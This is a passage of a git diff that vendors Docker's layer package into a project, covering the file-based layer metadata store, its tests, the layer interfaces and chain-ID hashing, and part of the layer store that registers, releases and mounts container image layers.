+		return nil, err
+	}
+	var wc io.WriteCloser
+	if compressInput {
+		wc = gzip.NewWriter(f)
+	} else {
+		wc = f
+	}
+
+	return ioutils.NewWriteCloserWrapper(wc, func() error {
+		wc.Close()
+		return f.Close()
+	}), nil
+}
+
+func (fm *fileMetadataTransaction) Commit(layer ChainID) error {
+	finalDir := fm.store.getLayerDirectory(layer)
+	if err := os.MkdirAll(filepath.Dir(finalDir), 0755); err != nil {
+		return err
+	}
+
+	return fm.ws.Commit(finalDir)
+}
+
+func (fm *fileMetadataTransaction) Cancel() error {
+	return fm.ws.Cancel()
+}
+
+func (fm *fileMetadataTransaction) String() string {
+	return fm.ws.String()
+}
+
+func (fms *fileMetadataStore) GetSize(layer ChainID) (int64, error) {
+	content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "size"))
+	if err != nil {
+		return 0, err
+	}
+
+	size, err := strconv.ParseInt(string(content), 10, 64)
+	if err != nil {
+		return 0, err
+	}
+
+	return size, nil
+}
+
+func (fms *fileMetadataStore) GetParent(layer ChainID) (ChainID, error) {
+	content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "parent"))
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", nil
+		}
+		return "", err
+	}
+
+	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	if err != nil {
+		return "", err
+	}
+
+	return ChainID(dgst), nil
+}
+
+func (fms *fileMetadataStore) GetDiffID(layer ChainID) (DiffID, error) {
+	content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "diff"))
+	if err != nil {
+		return "", err
+	}
+
+	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	if err != nil {
+		return "", err
+	}
+
+	return DiffID(dgst), nil
+}
+
+func (fms *fileMetadataStore) GetCacheID(layer ChainID) (string, error) {
+	contentBytes, err := ioutil.ReadFile(fms.getLayerFilename(layer, "cache-id"))
+	if err != nil {
+		return "", err
+	}
+	content := strings.TrimSpace(string(contentBytes))
+
+	if !stringIDRegexp.MatchString(content) {
+		return "", errors.New("invalid cache id value")
+	}
+
+	return content, nil
+}
+
+func (fms *fileMetadataStore) GetDescriptor(layer ChainID) (distribution.Descriptor, error) {
+	content, err := ioutil.ReadFile(fms.getLayerFilename(layer, "descriptor.json"))
+	if err != nil {
+		if os.IsNotExist(err) {
+			// only return empty descriptor to represent what is stored
+			return distribution.Descriptor{}, nil
+		}
+		return distribution.Descriptor{}, err
+	}
+
+	var ref distribution.Descriptor
+	err = json.Unmarshal(content, &ref)
+	if err != nil {
+		return distribution.Descriptor{}, err
+	}
+	return ref, err
+}
+
+func (fms *fileMetadataStore) TarSplitReader(layer ChainID) (io.ReadCloser, error) {
+	fz, err := os.Open(fms.getLayerFilename(layer, "tar-split.json.gz"))
+	if err != nil {
+		return nil, err
+	}
+	f, err := gzip.NewReader(fz)
+	if err != nil {
+		return nil, err
+	}
+
+	return ioutils.NewReadCloserWrapper(f, func() error {
+		f.Close()
+		return fz.Close()
+	}), nil
+}
+
+func (fms *fileMetadataStore) SetMountID(mount string, mountID string) error {
+	if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil {
+		return err
+	}
+	return ioutil.WriteFile(fms.getMountFilename(mount, "mount-id"), []byte(mountID), 0644)
+}
+
+func (fms *fileMetadataStore) SetInitID(mount string, init string) error {
+	if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil {
+		return err
+	}
+	return ioutil.WriteFile(fms.getMountFilename(mount, "init-id"), []byte(init), 0644)
+}
+
+func (fms *fileMetadataStore) SetMountParent(mount string, parent ChainID) error {
+	if err := os.MkdirAll(fms.getMountDirectory(mount), 0755); err != nil {
+		return err
+	}
+	return ioutil.WriteFile(fms.getMountFilename(mount, "parent"), []byte(digest.Digest(parent).String()), 0644)
+}
+
+func (fms *fileMetadataStore) GetMountID(mount string) (string, error) {
+	contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "mount-id"))
+	if err != nil {
+		return "", err
+	}
+	content := strings.TrimSpace(string(contentBytes))
+
+	if !stringIDRegexp.MatchString(content) {
+		return "", errors.New("invalid mount id value")
+	}
+
+	return content, nil
+}
+
+func (fms *fileMetadataStore) GetInitID(mount string) (string, error) {
+	contentBytes, err := ioutil.ReadFile(fms.getMountFilename(mount, "init-id"))
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", nil
+		}
+		return "", err
+	}
+	content := strings.TrimSpace(string(contentBytes))
+
+	if !stringIDRegexp.MatchString(content) {
+		return "", errors.New("invalid init id value")
+	}
+
+	return content, nil
+}
+
+func (fms *fileMetadataStore) GetMountParent(mount string) (ChainID, error) {
+	content, err := ioutil.ReadFile(fms.getMountFilename(mount, "parent"))
+	if err != nil {
+		if os.IsNotExist(err) {
+			return "", nil
+		}
+		return "", err
+	}
+
+	dgst, err := digest.ParseDigest(strings.TrimSpace(string(content)))
+	if err != nil {
+		return "", err
+	}
+
+	return ChainID(dgst), nil
+}
+
+func (fms *fileMetadataStore) List() ([]ChainID, []string, error) {
+	var ids []ChainID
+	for _, algorithm := range supportedAlgorithms {
+		fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, string(algorithm)))
+		if err != nil {
+			if os.IsNotExist(err) {
+				continue
+			}
+			return nil, nil, err
+		}
+
+		for _, fi := range fileInfos {
+			if fi.IsDir() && fi.Name() != "mounts" {
+				dgst := digest.NewDigestFromHex(string(algorithm), fi.Name())
+				if err := dgst.Validate(); err != nil {
+					logrus.Debugf("Ignoring invalid digest %s:%s", algorithm, fi.Name())
+				} else {
+					ids = append(ids, ChainID(dgst))
+				}
+			}
+		}
+	}
+
+	fileInfos, err := ioutil.ReadDir(filepath.Join(fms.root, "mounts"))
+	if err != nil {
+		if os.IsNotExist(err) {
+			return ids, []string{}, nil
+		}
+		return nil, nil, err
+	}
+
+	var mounts []string
+	for _, fi := range fileInfos {
+		if fi.IsDir() {
+			mounts = append(mounts, fi.Name())
+		}
+	}
+
+	return ids, mounts, nil
+}
+
+func (fms *fileMetadataStore) Remove(layer ChainID) error {
+	return os.RemoveAll(fms.getLayerDirectory(layer))
+}
+
+func (fms *fileMetadataStore) RemoveMount(mount string) error {
+	return os.RemoveAll(fms.getMountDirectory(mount))
+}
diff --git a/vendor/github.com/docker/docker/layer/filestore_test.go b/vendor/github.com/docker/docker/layer/filestore_test.go
new file mode 100644
index 0000000000..55e3b28530
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/filestore_test.go
@@ -0,0 +1,104 @@
+package layer
+
+import (
+	"fmt"
+	"io/ioutil"
+	"math/rand"
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+	"testing"
+
+	"github.com/docker/distribution/digest"
+)
+
+func randomLayerID(seed int64) ChainID {
+	r := rand.New(rand.NewSource(seed))
+
+	return ChainID(digest.FromBytes([]byte(fmt.Sprintf("%d", r.Int63()))))
+}
+
+func newFileMetadataStore(t *testing.T) (*fileMetadataStore, string, func()) {
+	td, err := ioutil.TempDir("", "layers-")
+	if err != nil {
+		t.Fatal(err)
+	}
+	fms, err := NewFSMetadataStore(td)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	return fms.(*fileMetadataStore), td, func() {
+		if err := os.RemoveAll(td); err != nil {
+			t.Logf("Failed to cleanup %q: %s", td, err)
+		}
+	}
+}
+
+func assertNotDirectoryError(t *testing.T, err error) {
+	perr, ok := err.(*os.PathError)
+	if !ok {
+		t.Fatalf("Unexpected error %#v, expected path error", err)
+	}
+
+	if perr.Err != syscall.ENOTDIR {
+		t.Fatalf("Unexpected error %s, expected %s", perr.Err, syscall.ENOTDIR)
+	}
+}
+
+func TestCommitFailure(t *testing.T) {
+	fms, td, cleanup := newFileMetadataStore(t)
+	defer cleanup()
+
+	if err := ioutil.WriteFile(filepath.Join(td, "sha256"), []byte("was here first!"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	tx, err := fms.StartTransaction()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if err := tx.SetSize(0); err != nil {
+		t.Fatal(err)
+	}
+
+	err = tx.Commit(randomLayerID(5))
+	if err == nil {
+		t.Fatalf("Expected error committing with invalid layer parent directory")
+	}
+	assertNotDirectoryError(t, err)
+}
+
+func TestStartTransactionFailure(t *testing.T) {
+	fms, td, cleanup := newFileMetadataStore(t)
+	defer cleanup()
+
+	if err := ioutil.WriteFile(filepath.Join(td, "tmp"), []byte("was here first!"), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	_, err := fms.StartTransaction()
+	if err == nil {
+		t.Fatalf("Expected error starting transaction with invalid layer parent directory")
+	}
+	assertNotDirectoryError(t, err)
+
+	if err := os.Remove(filepath.Join(td, "tmp")); err != nil {
+		t.Fatal(err)
+	}
+
+	tx, err := fms.StartTransaction()
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	if expected := filepath.Join(td, "tmp"); strings.HasPrefix(expected, tx.String()) {
+		t.Fatalf("Unexpected transaction string %q, expected prefix %q", tx.String(), expected)
+	}
+
+	if err := tx.Cancel(); err != nil {
+		t.Fatal(err)
+	}
+}
diff --git a/vendor/github.com/docker/docker/layer/layer.go b/vendor/github.com/docker/docker/layer/layer.go
new file mode 100644
index 0000000000..ec1d4346d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer.go
@@ -0,0 +1,275 @@
+// Package layer is package for managing read-only
+// and read-write mounts on the union file system
+// driver. Read-only mounts are referenced using a
+// content hash and are protected from mutation in
+// the exposed interface. The tar format is used
+// to create read-only layers and export both
+// read-only and writable layers. The exported
+// tar data for a read-only layer should match
+// the tar used to create the layer.
+package layer
+
+import (
+	"errors"
+	"io"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/pkg/archive"
+)
+
+var (
+	// ErrLayerDoesNotExist is used when an operation is
+	// attempted on a layer which does not exist.
+	ErrLayerDoesNotExist = errors.New("layer does not exist")
+
+	// ErrLayerNotRetained is used when a release is
+	// attempted on a layer which is not retained.
+	ErrLayerNotRetained = errors.New("layer not retained")
+
+	// ErrMountDoesNotExist is used when an operation is
+	// attempted on a mount layer which does not exist.
+	ErrMountDoesNotExist = errors.New("mount does not exist")
+
+	// ErrMountNameConflict is used when a mount is attempted
+	// to be created but there is already a mount with the name
+	// used for creation.
+	ErrMountNameConflict = errors.New("mount already exists with name")
+
+	// ErrActiveMount is used when an operation on a
+	// mount is attempted but the layer is still
+	// mounted and the operation cannot be performed.
+	ErrActiveMount = errors.New("mount still active")
+
+	// ErrNotMounted is used when requesting an active
+	// mount but the layer is not mounted.
+	ErrNotMounted = errors.New("not mounted")
+
+	// ErrMaxDepthExceeded is used when a layer is attempted
+	// to be created which would result in a layer depth
+	// greater than the 125 max.
+	ErrMaxDepthExceeded = errors.New("max depth exceeded")
+
+	// ErrNotSupported is used when the action is not supported
+	// on the current platform
+	ErrNotSupported = errors.New("not support on this platform")
+)
+
+// ChainID is the content-addressable ID of a layer.
+type ChainID digest.Digest
+
+// String returns a string rendition of a layer ID
+func (id ChainID) String() string {
+	return string(id)
+}
+
+// DiffID is the hash of an individual layer tar.
+type DiffID digest.Digest
+
+// String returns a string rendition of a layer DiffID
+func (diffID DiffID) String() string {
+	return string(diffID)
+}
+
+// TarStreamer represents an object which may
+// have its contents exported as a tar stream.
+type TarStreamer interface {
+	// TarStream returns a tar archive stream
+	// for the contents of a layer.
+	TarStream() (io.ReadCloser, error)
+}
+
+// Layer represents a read-only layer
+type Layer interface {
+	TarStreamer
+
+	// TarStreamFrom returns a tar archive stream for all the layer chain with
+	// arbitrary depth.
+	TarStreamFrom(ChainID) (io.ReadCloser, error)
+
+	// ChainID returns the content hash of the entire layer chain. The hash
+	// chain is made up of DiffID of top layer and all of its parents.
+	ChainID() ChainID
+
+	// DiffID returns the content hash of the layer
+	// tar stream used to create this layer.
+	DiffID() DiffID
+
+	// Parent returns the next layer in the layer chain.
+	Parent() Layer
+
+	// Size returns the size of the entire layer chain. The size
+	// is calculated from the total size of all files in the layers.
+	Size() (int64, error)
+
+	// DiffSize returns the size difference of the top layer
+	// from parent layer.
+	DiffSize() (int64, error)
+
+	// Metadata returns the low level storage metadata associated
+	// with layer.
+	Metadata() (map[string]string, error)
+}
+
+// RWLayer represents a layer which is
+// read and writable
+type RWLayer interface {
+	TarStreamer
+
+	// Name of mounted layer
+	Name() string
+
+	// Parent returns the layer which the writable
+	// layer was created from.
+	Parent() Layer
+
+	// Mount mounts the RWLayer and returns the filesystem path
+	// the to the writable layer.
+	Mount(mountLabel string) (string, error)
+
+	// Unmount unmounts the RWLayer. This should be called
+	// for every mount. If there are multiple mount calls
+	// this operation will only decrement the internal mount counter.
+	Unmount() error
+
+	// Size represents the size of the writable layer
+	// as calculated by the total size of the files
+	// changed in the mutable layer.
+	Size() (int64, error)
+
+	// Changes returns the set of changes for the mutable layer
+	// from the base layer.
+	Changes() ([]archive.Change, error)
+
+	// Metadata returns the low level metadata for the mutable layer
+	Metadata() (map[string]string, error)
+}
+
+// Metadata holds information about a
+// read-only layer
+type Metadata struct {
+	// ChainID is the content hash of the layer
+	ChainID ChainID
+
+	// DiffID is the hash of the tar data used to
+	// create the layer
+	DiffID DiffID
+
+	// Size is the size of the layer and all parents
+	Size int64
+
+	// DiffSize is the size of the top layer
+	DiffSize int64
+}
+
+// MountInit is a function to initialize a
+// writable mount. Changes made here will
+// not be included in the Tar stream of the
+// RWLayer.
+type MountInit func(root string) error
+
+// Store represents a backend for managing both
+// read-only and read-write layers.
+type Store interface {
+	Register(io.Reader, ChainID) (Layer, error)
+	Get(ChainID) (Layer, error)
+	Map() map[ChainID]Layer
+	Release(Layer) ([]Metadata, error)
+
+	CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error)
+	GetRWLayer(id string) (RWLayer, error)
+	GetMountID(id string) (string, error)
+	ReleaseRWLayer(RWLayer) ([]Metadata, error)
+
+	Cleanup() error
+	DriverStatus() [][2]string
+	DriverName() string
+}
+
+// DescribableStore represents a layer store capable of storing
+// descriptors for layers.
+type DescribableStore interface {
+	RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error)
+}
+
+// MetadataTransaction represents functions for setting layer metadata
+// with a single transaction.
+type MetadataTransaction interface {
+	SetSize(int64) error
+	SetParent(parent ChainID) error
+	SetDiffID(DiffID) error
+	SetCacheID(string) error
+	SetDescriptor(distribution.Descriptor) error
+	TarSplitWriter(compressInput bool) (io.WriteCloser, error)
+
+	Commit(ChainID) error
+	Cancel() error
+	String() string
+}
+
+// MetadataStore represents a backend for persisting
+// metadata about layers and providing the metadata
+// for restoring a Store.
+type MetadataStore interface {
+	// StartTransaction starts an update for new metadata
+	// which will be used to represent an ID on commit.
+	StartTransaction() (MetadataTransaction, error)
+
+	GetSize(ChainID) (int64, error)
+	GetParent(ChainID) (ChainID, error)
+	GetDiffID(ChainID) (DiffID, error)
+	GetCacheID(ChainID) (string, error)
+	GetDescriptor(ChainID) (distribution.Descriptor, error)
+	TarSplitReader(ChainID) (io.ReadCloser, error)
+
+	SetMountID(string, string) error
+	SetInitID(string, string) error
+	SetMountParent(string, ChainID) error
+
+	GetMountID(string) (string, error)
+	GetInitID(string) (string, error)
+	GetMountParent(string) (ChainID, error)
+
+	// List returns the full list of referenced
+	// read-only and read-write layers
+	List() ([]ChainID, []string, error)
+
+	Remove(ChainID) error
+	RemoveMount(string) error
+}
+
+// CreateChainID returns ID for a layerDigest slice
+func CreateChainID(dgsts []DiffID) ChainID {
+	return createChainIDFromParent("", dgsts...)
+}
+
+func createChainIDFromParent(parent ChainID, dgsts ...DiffID) ChainID {
+	if len(dgsts) == 0 {
+		return parent
+	}
+	if parent == "" {
+		return createChainIDFromParent(ChainID(dgsts[0]), dgsts[1:]...)
+	}
+	// H = "H(n-1) SHA256(n)"
+	dgst := digest.FromBytes([]byte(string(parent) + " " + string(dgsts[0])))
+	return createChainIDFromParent(ChainID(dgst), dgsts[1:]...)
+}
+
+// ReleaseAndLog releases the provided layer from the given layer
+// store, logging any error and release metadata
+func ReleaseAndLog(ls Store, l Layer) {
+	metadata, err := ls.Release(l)
+	if err != nil {
+		logrus.Errorf("Error releasing layer %s: %v", l.ChainID(), err)
+	}
+	LogReleaseMetadata(metadata)
+}
+
+// LogReleaseMetadata logs a metadata array, uses this to
+// ensure consistent logging for release metadata
+func LogReleaseMetadata(metadatas []Metadata) {
+	for _, metadata := range metadatas {
+		logrus.Infof("Layer %s cleaned up", metadata.ChainID)
+	}
+}
diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go
new file mode 100644
index 0000000000..1a1ff9fe59
--- /dev/null
+++ b/vendor/github.com/docker/docker/layer/layer_store.go
@@ -0,0 +1,684 @@
+package layer
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"sync"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/vbatts/tar-split/tar/asm"
+	"github.com/vbatts/tar-split/tar/storage"
+)
+
+// maxLayerDepth represents the maximum number of
+// layers which can be chained together. 125 was
+// chosen to account for the 127 max in some
+// graphdrivers plus the 2 additional layers
+// used to create a rwlayer.
+const maxLayerDepth = 125
+
+type layerStore struct {
+	store  MetadataStore
+	driver graphdriver.Driver
+
+	layerMap map[ChainID]*roLayer
+	layerL   sync.Mutex
+
+	mounts map[string]*mountedLayer
+	mountL sync.Mutex
+}
+
+// StoreOptions are the options used to create a new Store instance
+type StoreOptions struct {
+	StorePath                 string
+	MetadataStorePathTemplate string
+	GraphDriver               string
+	GraphDriverOptions        []string
+	UIDMaps                   []idtools.IDMap
+	GIDMaps                   []idtools.IDMap
+	PluginGetter              plugingetter.PluginGetter
+	ExperimentalEnabled       bool
+}
+
+// NewStoreFromOptions creates a new Store instance
+func NewStoreFromOptions(options StoreOptions) (Store, error) {
+	driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{
+		Root:                options.StorePath,
+		DriverOptions:       options.GraphDriverOptions,
+		UIDMaps:             options.UIDMaps,
+		GIDMaps:             options.GIDMaps,
+		ExperimentalEnabled: options.ExperimentalEnabled,
+	})
+	if err != nil {
+		return nil, fmt.Errorf("error initializing graphdriver: %v", err)
+	}
+	logrus.Debugf("Using graph driver %s", driver)
+
+	fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver))
+	if err != nil {
+		return nil, err
+	}
+
+	return NewStoreFromGraphDriver(fms, driver)
+}
+
+// NewStoreFromGraphDriver creates a new Store instance using the provided
+// metadata store and graph driver. The metadata store will be used to restore
+// the Store.
+func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) {
+	ls := &layerStore{
+		store:    store,
+		driver:   driver,
+		layerMap: map[ChainID]*roLayer{},
+		mounts:   map[string]*mountedLayer{},
+	}
+
+	ids, mounts, err := store.List()
+	if err != nil {
+		return nil, err
+	}
+
+	for _, id := range ids {
+		l, err := ls.loadLayer(id)
+		if err != nil {
+			logrus.Debugf("Failed to load layer %s: %s", id, err)
+			continue
+		}
+		if l.parent != nil {
+			l.parent.referenceCount++
+		}
+	}
+
+	for _, mount := range mounts {
+		if err := ls.loadMount(mount); err != nil {
+			logrus.Debugf("Failed to load mount %s: %s", mount, err)
+		}
+	}
+
+	return ls, nil
+}
+
+func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) {
+	cl, ok := ls.layerMap[layer]
+	if ok {
+		return cl, nil
+	}
+
+	diff, err := ls.store.GetDiffID(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get diff id for %s: %s", layer, err)
+	}
+
+	size, err := ls.store.GetSize(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get size for %s: %s", layer, err)
+	}
+
+	cacheID, err := ls.store.GetCacheID(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get cache id for %s: %s", layer, err)
+	}
+
+	parent, err := ls.store.GetParent(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get parent for %s: %s", layer, err)
+	}
+
+	descriptor, err := ls.store.GetDescriptor(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err)
+	}
+
+	cl = &roLayer{
+		chainID:    layer,
+		diffID:     diff,
+		size:       size,
+		cacheID:    cacheID,
+		layerStore: ls,
+		references: map[Layer]struct{}{},
+		descriptor: descriptor,
+	}
+
+	if parent != "" {
+		p, err := ls.loadLayer(parent)
+		if err != nil {
+			return nil, err
+		}
+		cl.parent = p
+	}
+
+	ls.layerMap[cl.chainID] = cl
+
+	return cl, nil
+}
+
+func (ls *layerStore) loadMount(mount string) error {
+	if _, ok := ls.mounts[mount]; ok {
+		return nil
+	}
+
+	mountID, err := ls.store.GetMountID(mount)
+	if err != nil {
+		return err
+	}
+
+	initID, err := ls.store.GetInitID(mount)
+	if err != nil {
+		return err
+	}
+
+	parent, err := ls.store.GetMountParent(mount)
+	if err != nil {
+		return err
+	}
+
+	ml := &mountedLayer{
+		name:       mount,
+		mountID:    mountID,
+		initID:     initID,
+		layerStore: ls,
+		references: map[RWLayer]*referencedRWLayer{},
+	}
+
+	if parent != "" {
+		p, err := ls.loadLayer(parent)
+		if err != nil {
+			return err
+		}
+		ml.parent = p
+
+		p.referenceCount++
+	}
+
+	ls.mounts[ml.name] = ml
+
+	return nil
+}
+
+func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error {
+	digester := digest.Canonical.New()
+	tr := io.TeeReader(ts, digester.Hash())
+
+	tsw, err := tx.TarSplitWriter(true)
+	if err != nil {
+		return err
+	}
+	metaPacker := storage.NewJSONPacker(tsw)
+	defer tsw.Close()
+
+	// we're passing nil here for the file putter, because the ApplyDiff will
+	// handle the extraction of the archive
+	rdr, err := asm.NewInputTarStream(tr, metaPacker, nil)
+	if err != nil {
+		return err
+	}
+
+	applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr)
+	if err != nil {
+		return err
+	}
+
+	// Discard trailing data but ensure metadata is picked up to reconstruct stream
+	io.Copy(ioutil.Discard, rdr) // ignore error as reader may be closed
+
+	layer.size = applySize
+	layer.diffID = DiffID(digester.Digest())
+
+	logrus.Debugf("Applied tar %s to %s, size: %d", layer.diffID, layer.cacheID, applySize)
+
+	return nil
+}
+
+func (ls *layerStore) Register(ts io.Reader, parent ChainID) (Layer, error) {
+	return ls.registerWithDescriptor(ts, parent, distribution.Descriptor{})
+}
+
+func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descriptor distribution.Descriptor) (Layer, error) {
+	// err is used to hold the error which will always trigger
+	// cleanup of creates sources but may not be an error returned
+	// to the caller (already exists).
+	var err error
+	var pid string
+	var p *roLayer
+	if string(parent) != "" {
+		p = ls.get(parent)
+		if p == nil {
+			return nil, ErrLayerDoesNotExist
+		}
+		pid = p.cacheID
+		// Release parent chain if error
+		defer func() {
+			if err != nil {
+				ls.layerL.Lock()
+				ls.releaseLayer(p)
+				ls.layerL.Unlock()
+			}
+		}()
+		if p.depth() >= maxLayerDepth {
+			err = ErrMaxDepthExceeded
+			return nil, err
+		}
+	}
+
+	// Create new roLayer
+	layer := &roLayer{
+		parent:         p,
+		cacheID:        stringid.GenerateRandomID(),
+		referenceCount: 1,
+		layerStore:     ls,
+		references:     map[Layer]struct{}{},
+		descriptor:     descriptor,
+	}
+
+	if err = ls.driver.Create(layer.cacheID, pid, nil); err != nil {
+		return nil, err
+	}
+
+	tx, err := ls.store.StartTransaction()
+	if err != nil {
+		return nil, err
+	}
+
+	defer func() {
+		if err != nil {
+			logrus.Debugf("Cleaning up layer %s: %v", layer.cacheID, err)
+			if err := ls.driver.Remove(layer.cacheID); err != nil {
+				logrus.Errorf("Error cleaning up cache layer %s: %v", layer.cacheID, err)
+			}
+			if err := tx.Cancel(); err != nil {
+				logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err)
+			}
+		}
+	}()
+
+	if err = ls.applyTar(tx, ts, pid, layer); err != nil {
+		return nil, err
+	}
+
+	if layer.parent == nil {
+		layer.chainID = ChainID(layer.diffID)
+	} else {
+		layer.chainID = createChainIDFromParent(layer.parent.chainID, layer.diffID)
+	}
+
+	if err = storeLayer(tx, layer); err != nil {
+		return nil, err
+	}
+
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil {
+		// Set error for cleanup, but do not return the error
+		err = errors.New("layer already exists")
+		return existingLayer.getReference(), nil
+	}
+
+	if err = tx.Commit(layer.chainID); err != nil {
+		return nil, err
+	}
+
+	ls.layerMap[layer.chainID] = layer
+
+	return layer.getReference(), nil
+}
+
+func (ls *layerStore) getWithoutLock(layer ChainID) *roLayer {
+	l, ok := ls.layerMap[layer]
+	if !ok {
+		return nil
+	}
+
+	l.referenceCount++
+
+	return l
+}
+
+func (ls *layerStore) get(l ChainID) *roLayer {
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+	return ls.getWithoutLock(l)
+}
+
+func (ls *layerStore) Get(l ChainID) (Layer, error) {
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	layer := ls.getWithoutLock(l)
+	if layer == nil {
+		return nil, ErrLayerDoesNotExist
+	}
+
+	return layer.getReference(), nil
+}
+
+func (ls *layerStore) Map() map[ChainID]Layer {
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+
+	layers := map[ChainID]Layer{}
+
+	for k, v := range ls.layerMap {
+		layers[k] = v
+	}
+
+	return layers
+}
+
+func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error {
+	err := ls.driver.Remove(layer.cacheID)
+	if err != nil {
+		return err
+	}
+
+	err = ls.store.Remove(layer.chainID)
+	if err != nil {
+		return err
+	}
+	metadata.DiffID = layer.diffID
+	metadata.ChainID = layer.chainID
+	metadata.Size, err = layer.Size()
+	if err != nil {
+		return err
+	}
+	metadata.DiffSize = layer.size
+
+	return nil
+}
+
+func (ls *layerStore) releaseLayer(l *roLayer) ([]Metadata, error) {
+	depth := 0
+	removed := []Metadata{}
+	for {
+		if l.referenceCount == 0 {
+			panic("layer not retained")
+		}
+		l.referenceCount--
+		if l.referenceCount != 0 {
+			return removed, nil
+		}
+
+		if len(removed) == 0 && depth > 0 {
+			panic("cannot remove layer with child")
+		}
+		if l.hasReferences() {
+			panic("cannot delete referenced layer")
+		}
+		var metadata Metadata
+		if err := ls.deleteLayer(l, &metadata); err != nil {
+			return nil, err
+		}
+
+		delete(ls.layerMap, l.chainID)
+		removed = append(removed, metadata)
+
+		if l.parent == nil {
+			return removed, nil
+		}
+
+		depth++
+		l = l.parent
+	}
+}
+
+func (ls *layerStore) Release(l Layer) ([]Metadata, error) {
+	ls.layerL.Lock()
+	defer ls.layerL.Unlock()
+	layer, ok := ls.layerMap[l.ChainID()]
+	if !ok {
+		return []Metadata{}, nil
+	}
+	if !layer.hasReference(l) {
+		return nil, ErrLayerNotRetained
+	}
+
+	layer.deleteReference(l)
+
+	return ls.releaseLayer(layer)
+}
+
+func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) {
+	ls.mountL.Lock()
+	defer ls.mountL.Unlock()
+	m, ok := ls.mounts[name]
+	if ok {
+		return nil, ErrMountNameConflict
+	}
+
+	var err error
+	var pid string
+	var p *roLayer
+	if string(parent) != "" {
+		p = ls.get(parent)
+		if p == nil {
+			return nil, ErrLayerDoesNotExist
+		}
+		pid = p.cacheID
+
+		// Release parent chain if error
+		defer func() {
+			if err != nil {
+				ls.layerL.Lock()
+				ls.releaseLayer(p)
+				ls.layerL.Unlock()
+			}
+		}()
+	}
+
+	m = &mountedLayer{
+		name:       name,
+		parent:     p,
+		mountID:    ls.mountID(name),
+		layerStore: ls,
+		references: map[RWLayer]*referencedRWLayer{},
+	}
+
+	if initFunc != nil {
+		pid, err = ls.initMount(m.mountID, pid, mountLabel, initFunc, storageOpt)
+		if err != nil {
+			return nil, err
+		}
+		m.initID = pid
+	}
+
+	createOpts := &graphdriver.CreateOpts{
+		StorageOpt: storageOpt,
+	}
+
+	if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil {
+		return nil, err
+	}
+
+	if err = ls.saveMount(m); err != nil {
+		return nil, err
+	}
+
+	return m.getReference(), nil
+}
+
+func (ls *layerStore) GetRWLayer(id string) (RWLayer, error) {
+	ls.mountL.Lock()
+	defer ls.mountL.Unlock()
+	mount, ok := ls.mounts[id]
+	if !ok {
+		return nil, ErrMountDoesNotExist
+	}
+
+	return mount.getReference(), nil
+}
+
+func (ls *layerStore) GetMountID(id string) (string, error) {
+	ls.mountL.Lock()
+	defer ls.mountL.Unlock()
+	mount, ok := ls.mounts[id]
+	if !ok {
+		return "", ErrMountDoesNotExist
+	}
+	logrus.Debugf("GetMountID id: %s -> mountID: %s", id, mount.mountID)
+
+	return mount.mountID, nil
+}
+
+func (ls *layerStore) ReleaseRWLayer(l RWLayer) ([]Metadata, error) {
+	ls.mountL.Lock()
+	defer ls.mountL.Unlock()
+	m, ok := ls.mounts[l.Name()]
+	if !ok {
+		return []Metadata{}, nil
+	}
+
+	if err := m.deleteReference(l); err != nil {
+		return nil, err
+	}
+
+	if m.hasReferences() {
+		return []Metadata{}, nil
+	}
+
+	if err := ls.driver.Remove(m.mountID); err != nil {
